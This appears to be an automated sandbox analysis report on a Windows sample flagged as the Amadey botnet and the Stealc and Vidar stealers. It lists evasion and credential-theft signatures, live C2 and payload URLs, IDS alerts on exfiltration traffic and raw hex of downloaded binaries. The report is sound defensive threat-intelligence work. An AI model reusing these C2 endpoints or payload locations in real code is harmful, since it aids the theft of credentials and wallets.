Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1502390
MD5: d2d35997021550d304bf21a670921efe
SHA1: 974ed61752963812b1005e85d5077e43b00afc6b
SHA256: 5da8190ffd2e3bfbc685b9de6e326eefe60be0b51a5be2ea38634e45287ccfbc
Tags: exe

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.100/ URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.100 URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpHarddiskVolumef Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phpion: Avira URL Cloud: Label: malware
Source: http://185.215.113.100/ZkRm Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllllo Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllP Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll5 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllK Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpAppDataB$ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phprowser Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllY Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpmainnet Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllllG Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpm& Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php26 Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllll9 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/ws Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpppData Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phprofiles Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpDq Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php/ Avira URL Cloud: Label: malware
Source: http://185.215.113.19/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.php2 Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpDu Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php3 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeBH Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlld Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php# Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpAECGHCBGCBFHIIDHI$3 Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php53001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/ocal Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dlla Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpT Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dllk Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpL Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phptch Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phps Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phpM Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpz Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dllA Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpU Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpA Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpE36 Avira URL Cloud: Label: malware
Source: http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49# Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php3001 Avira URL Cloud: Label: phishing
Source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: explorti.exe.7692.6.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: http://185.215.113.100/e2b1563c6670f193.phpion: Virustotal: Detection: 6%
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllP Virustotal: Detection: 18%
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllK Virustotal: Detection: 18%
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll5 Virustotal: Detection: 15%
Source: http://185.215.113.100/e2b1563c6670f193.phprowser Virustotal: Detection: 10%
Source: http://185.215.113.19/Vi9leo/index.php Virustotal: Detection: 24%
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllY Virustotal: Detection: 14%
Source: http://185.215.113.100/ws Virustotal: Detection: 7%
Source: http://185.215.113.19/Vi9leo/index.phpppData Virustotal: Detection: 19%
Source: http://185.215.113.16/well/random.exe Virustotal: Detection: 25%
Source: http://185.215.113.19/ Virustotal: Detection: 18%
Source: http://185.215.113.100/e2b1563c6670f193.php/ Virustotal: Detection: 7%
Source: http://185.215.113.100/e2b1563c6670f193.php2 Virustotal: Detection: 10%
Source: http://185.215.113.100/e2b1563c6670f193.php3 Virustotal: Detection: 7%
Source: file.exe Virustotal: Detection: 56%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 7_2_6C8E6C80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 7_2_6CA3A9A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA344C0 PK11_PubEncrypt, 7_2_6CA344C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 7_2_6CA04420
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA34440 PK11_PrivDecrypt, 7_2_6CA34440
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 7_2_6CA825B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 7_2_6CA1E6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA18670 PK11_ExportEncryptedPrivKeyInfo, 7_2_6CA18670
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 7_2_6CA3A650
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 7_2_6CA5A730
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 7_2_6CA60180
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA343B0 PK11_PubEncryptPKCS1,PR_SetError, 7_2_6CA343B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 7_2_6CA57C00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 7_2_6CA5BD30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA17D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 7_2_6CA17D60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA59EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 7_2_6CA59EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA33FF0 PK11_PrivDecryptPKCS1, 7_2_6CA33FF0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: nss3.pdb@ source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr, vcruntime140[1].dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr, msvcp140[1].dll.7.dr
Source: Binary string: nss3.pdb source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: mozglue.pdb source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49737
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49739 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49742 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49744 -> 185.215.113.19:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49796 -> 185.215.113.100:80
Source: Malware configuration extractor URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.19
Source: global traffic TCP traffic: 192.168.2.4:52614 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 03:09:06 GMTContent-Type: application/octet-streamContent-Length: 1771008Last-Modified: Sun, 01 Sep 2024 01:45:41 GMTConnection: keep-aliveETag: "66d3c745-1b0600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 03:09:13 GMTContent-Type: application/octet-streamContent-Length: 917504Last-Modified: Sun, 01 Sep 2024 03:01:38 GMTConnection: keep-aliveETag: "66d3d912-e0000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-program
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 